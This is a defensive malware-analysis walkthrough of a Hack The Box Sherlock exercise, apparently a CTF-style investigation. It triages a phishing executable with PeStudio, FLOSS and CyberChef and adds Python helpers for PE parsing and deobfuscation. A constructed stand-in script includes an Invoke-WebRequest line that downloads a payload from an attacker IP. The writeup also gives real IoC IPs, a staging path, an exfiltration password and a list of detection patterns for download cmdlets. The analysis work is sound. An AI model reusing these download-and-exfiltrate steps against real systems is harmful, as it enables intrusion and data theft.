# Heartbreaker-Continuum

## **Sherlock Scenario**

Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.

{% embed url="<https://app.hackthebox.com/sherlocks/Heartbreaker-Continuum>" %}

***

## Setting Up the Environment

First, download the given file and unzip it. The password for the archive is `hacktheblue`.

<figure><img src="/files/ozvaJKWuT6Spb0J6y5Ee" alt=""><figcaption></figcaption></figure>

The zip file contains an executable named `Superstar_MemberCard.tiff.exe`.

***

## **Task 1**

### Question

To accurately reference and identify the suspicious binary, please provide its SHA256 hash.

### Solution

I used `PeStudio` to get the SHA256 hash of the given executable. You can download `PeStudio` from the following link: <https://www.winitor.com/download>.

Once you have opened the executable in `PeStudio` via `File` -> `Open`, you can find the SHA256 hash under the `footprints` tab.

<figure><img src="/files/RTb1RSXzt8mMJYckP7NZ" alt=""><figcaption></figcaption></figure>

**Answer:** `12DAA34111BB54B3DCBAD42305663E44E7E6C3842F015CCCBBE6564D9DFD3EA3`

***

## **Task 2**

### Question

When was the binary file originally created, according to its metadata (UTC)?

### Solution

You can find the creation date of the given executable under the `file-header` tab of `PeStudio`.

<figure><img src="/files/B3TdmLH3QZHxw38FFuI0" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Make sure that you enter the answer in the following format: `YYYY-MM-DD HH:MM:SS`.
{% endhint %}

**Answer:** `2024-03-13 10:38:06`

***

## **Task 3**

### Question

Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

### Solution

In a PE executable, the code usually lives in the `.text` section. You can find the details of the `.text` section of the given executable under the `sections` tab of `PeStudio`.

<figure><img src="/files/RZwtIzkCuOxr6D33Zs1l" alt=""><figcaption></figcaption></figure>

**Answer:** `38400`
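Tasks 1 to 3 all read fields that `PeStudio` pulls straight from the PE headers: the file hash, the COFF `TimeDateStamp` (rendered in UTC) and the code size. The following script is an added example, not part of the original writeup and not the Sherlock sample itself: it builds a constructed minimal PE32+ image (the timestamp and sizes are set to the values reported on this page) and parses the same three facts out of it with nothing but the standard library, so the numbers can be reproduced without a GUI tool.

```python
import hashlib
import struct
from datetime import datetime, timezone

# Constructed sample: a minimal PE32+ image with an MZ stub, COFF header,
# optional header and one ".text" section. It is NOT the Sherlock binary;
# the timestamp and sizes mirror the values this writeup reports.
SAMPLE_TIMESTAMP = 1710326286        # 2024-03-13 10:38:06 UTC
SAMPLE_SIZE_OF_CODE = 38400          # bytes


def build_sample_pe() -> bytes:
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, SAMPLE_TIMESTAMP, 0, 0, 240, 0x0022)
    # Optional header (PE32+): Magic, linker major/minor, SizeOfCode, then zero padding
    opt = struct.pack("<HBBI", 0x20B, 14, 0, SAMPLE_SIZE_OF_CODE)
    opt += b"\x00" * (240 - len(opt))
    # One section table entry for ".text"
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x95E4, 0x1000,
                       SAMPLE_SIZE_OF_CODE, 0x400, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + text


def triage_pe(data: bytes) -> dict:
    """Return hash, compile time (UTC), code size and section layout of a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", data, coff_off)
    opt_off = coff_off + 20
    magic, = struct.unpack_from("<H", data, opt_off)
    size_of_code, = struct.unpack_from("<I", data, opt_off + 4)  # same for PE32 and PE32+
    sections = {}
    sec_off = opt_off + opt_size
    for i in range(nsections):
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, sec_off + 40 * i)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = {
            "virtual_size": vsize, "virtual_address": vaddr,
            "raw_size": raw_size, "raw_offset": raw_ptr,
        }
    return {
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "machine": machine,
        "is_pe32plus": magic == 0x20B,
        "compile_time_utc": datetime.fromtimestamp(
            timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "size_of_code": size_of_code,
        "sections": sections,
    }


if __name__ == "__main__":
    report = triage_pe(build_sample_pe())
    for key, value in report.items():
        print(f"{key}: {value}")
```

To run it against a real file, replace `build_sample_pe()` with `open(path, "rb").read()`. Two caveats worth keeping in mind when you report these values: the COFF timestamp is set by the linker and can be zeroed or forged, so it is evidence of build time only when it is consistent with other artefacts, and `SizeOfCode` in the optional header is the sum of all code sections, which normally but not always equals the raw size of `.text`.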

***

## **Task 4**

### Question

It appears that the binary may have undergone a file conversion process. Could you determine its original filename?

### Solution

You can find the original file name from before the conversion under the `resources` tab of `PeStudio`.

<figure><img src="/files/CF9uEszFTb4cKSAyikZq" alt=""><figcaption></figcaption></figure>

**Answer:** `newILY.ps1`

***

## **Task 5**

### Question

Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.

### Solution

To identify the hexadecimal offset of the obfuscated code, I used the `HxD` hex editor. You can download `HxD` from the following link: <https://mh-nexus.de/en/hxd/>.

{% hint style="info" %}
You can also get the hexadecimal offset of the obfuscated code from the `location` column of the `newILY.ps1` entry under the `resources` tab of `PeStudio`.
{% endhint %}

<figure><img src="/files/BHATUwIJi0JW7VmTvY6U" alt=""><figcaption></figcaption></figure>

Set the bytes-per-row setting to `4`, as shown in the image above, so that the row offset lines up exactly with the first byte of the obfuscated code.

**Answer:** `2C74`

***

## **Task 6**

### Question

The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?

### Solution

I used `FLOSS` to extract all the strings in the given executable. You can download `FLOSS` from the following link: <https://github.com/mandiant/flare-floss/releases/tag/v3.1.0>.

{% hint style="info" %}
You can also use the Sysinternals `strings.exe` to do the same: <https://learn.microsoft.com/en-us/sysinternals/downloads/strings>
{% endhint %}

<figure><img src="/files/Ne0Cp1E5F7icRfD20Lq1" alt=""><figcaption></figcaption></figure>

From the output of `FLOSS`, you can find the obfuscated code, as shown in the following image.

<figure><img src="/files/mRgLIWYvce6w8TTRaJDJ" alt=""><figcaption></figcaption></figure>

The code is obfuscated by `Base64`-encoding it and then reversing the result. I used `CyberChef` to reverse the string and `Base64`-decode it to get the actual code.

{% embed url="<https://gchq.github.io/CyberChef/>" %}

<figure><img src="/files/2qxLYFUFVe3J6CNxvv7R" alt=""><figcaption></figcaption></figure>

You can use the following link to reproduce the output shown in the image above in `CyberChef`.

```url
https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=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&oeol=CRLF
```

**Answer:** `Base64`

***

## **Task 7**

### Question

What is the specific cmdlet utilized that was used to initiate file downloads?

### Solution

You can find the cmdlet used in the decoded version of the obfuscated code as shown in the following image.

<figure><img src="/files/JbpSPyZge2IrW3kYs47b" alt=""><figcaption></figcaption></figure>

**Answer:** `Invoke-WebRequest`

***

## **Task 8**

### Question

Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.

### Solution

You can extract the IP addresses and sort them in ascending order using `CyberChef`, as shown in the following image.

<figure><img src="/files/eYccuNUQqxUwK36nCXGV" alt=""><figcaption></figcaption></figure>

You can use the following link to reproduce the output shown in the image above in `CyberChef`.

```url
https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)Extract_IP_addresses(true,false,false,false,true,true)&input=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&oeol=CRLF
```

**Answer:** `35.169.66.138,44.206.187.144`

***

## **Task 9**

### Question

The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?

### Solution

You can find the directory in the deobfuscated code, as shown in the following image.

<figure><img src="/files/opNP3YNn0RcwsjHE5vBa" alt=""><figcaption></figcaption></figure>

**Answer:** `C:\Users\Public\Public Files`
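Tasks 5 through 9 are one pipeline: locate the embedded blob in the binary, undo the reverse-then-Base64 layering, and then pull the download cmdlet, the network IoCs and the staging path out of the recovered script. The script below is an added example and is not code from the writeup or from the Sherlock sample: it constructs a stand-in "binary" whose payload is placed at the offset this writeup found (`0x2C74`) and a constructed PowerShell stand-in that reuses only the IoCs named on this page, then runs the same steps the CyberChef recipe performs. It goes a little beyond the recipe by validating octets (so version strings such as `1.22.333.4` are not reported as addresses) and by sorting numerically rather than lexically.

```python
import base64
import re

# Constructed stand-in for the decoded script (NOT the real newILY.ps1).
# Only the IoCs this writeup names are reused; it contains no working logic.
SAMPLE_SCRIPT = r"""
$staging = 'C:\Users\Public\Public Files'
New-Item -ItemType Directory -Force -Path $staging | Out-Null
Invoke-WebRequest -Uri 'http://44.206.187.144/<PLACEHOLDER>' -OutFile "$staging\payload.bin"
$exfilHost = '35.169.66.138'
Write-Host 'build 1.22.333.4 is a version string, not an address'
"""


def obfuscate(script: str) -> bytes:
    """The scheme described in Task 6: Base64-encode, then reverse the text."""
    return base64.b64encode(script.encode("utf-8"))[::-1]


def deobfuscate(blob: bytes) -> str:
    """Undo it (CyberChef: Reverse('Character') then From_Base64)."""
    return base64.b64decode(blob[::-1]).decode("utf-8", errors="replace")


# Constructed "binary": zero padding so the blob starts at 0x2C74, the offset
# this writeup found with HxD, followed by the blob and some trailing bytes.
PAYLOAD_OFFSET = 0x2C74
SAMPLE_BINARY = (b"MZ" + b"\x00" * (PAYLOAD_OFFSET - 2)
                 + obfuscate(SAMPLE_SCRIPT) + b"\x00" * 16)

BASE64_RUN = re.compile(rb"[A-Za-z0-9+/=]{64,}")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
WIN_PATH = re.compile(r"""[A-Za-z]:\\[^'"\r\n|]*""")
# PowerShell download primitives a triage pass should flag.
DOWNLOADERS = ("Invoke-WebRequest", "Invoke-RestMethod", "Start-BitsTransfer",
               "iwr", "DownloadFile", "DownloadString")
DOWNLOADER_RE = re.compile(
    r"\b(" + "|".join(map(re.escape, DOWNLOADERS)) + r")\b", re.IGNORECASE)


def find_base64_runs(data: bytes) -> list:
    """(offset, length) of every long Base64-looking run in a binary."""
    return [(m.start(), m.end() - m.start()) for m in BASE64_RUN.finditer(data)]


def extract_ips(text: str) -> list:
    """Unique, octet-validated IPv4 addresses in numeric ascending order."""
    found = set()
    for m in IPV4.finditer(text):
        if all(int(o) <= 255 for o in m.group(0).split(".")):
            found.add(m.group(0))
    return sorted(found, key=lambda ip: tuple(int(o) for o in ip.split(".")))


def find_download_cmdlets(text: str) -> list:
    canonical = {name.lower(): name for name in DOWNLOADERS}
    return sorted({canonical[m.group(0).lower()] for m in DOWNLOADER_RE.finditer(text)})


def extract_windows_paths(text: str) -> list:
    return sorted({m.group(0).rstrip() for m in WIN_PATH.finditer(text)})


def triage_report(binary: bytes) -> dict:
    runs = find_base64_runs(binary)
    if not runs:
        raise ValueError("no Base64-looking run found in the binary")
    offset, length = max(runs, key=lambda r: r[1])   # longest run is the script
    script = deobfuscate(binary[offset:offset + length])
    return {
        "payload_offset_hex": f"{offset:X}",          # same notation HxD shows
        "script": script,
        "download_cmdlets": find_download_cmdlets(script),
        "ips": extract_ips(script),
        "paths": extract_windows_paths(script),
    }


if __name__ == "__main__":
    report = triage_report(SAMPLE_BINARY)
    for key in ("payload_offset_hex", "download_cmdlets", "ips", "paths"):
        print(f"{key}: {report[key]}")
```

On a real sample, feed the file bytes to `triage_report` and review `report["script"]` by hand: regexes are a first pass, and a script can build hostnames or paths from fragments that no single pattern will catch. Picking the longest Base64 run is a heuristic that works here because the script is the largest encoded string in the binary; if several runs are found, decode each of them.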

***

## **Task 10**

### Question

What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?

### Solution

The malicious binary uses the MITRE ATT&CK technique with ID `T1119` (Automated Collection). You can find more details about this technique at the following link.

{% embed url="<https://attack.mitre.org/techniques/T1119/>" %}

<figure><img src="/files/Wp4SxYVHzM6jf5yk4xSj" alt=""><figcaption></figcaption></figure>

**Answer:** `T1119`

***

## **Task 11**

### Question

What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?

### Solution

You can find the password in the deobfuscated code, as shown in the following image.

<figure><img src="/files/hGtNz7jitrPDS8mmBe9j" alt=""><figcaption></figcaption></figure>

**Answer:** `M8&C!i6KkmGL1-#`


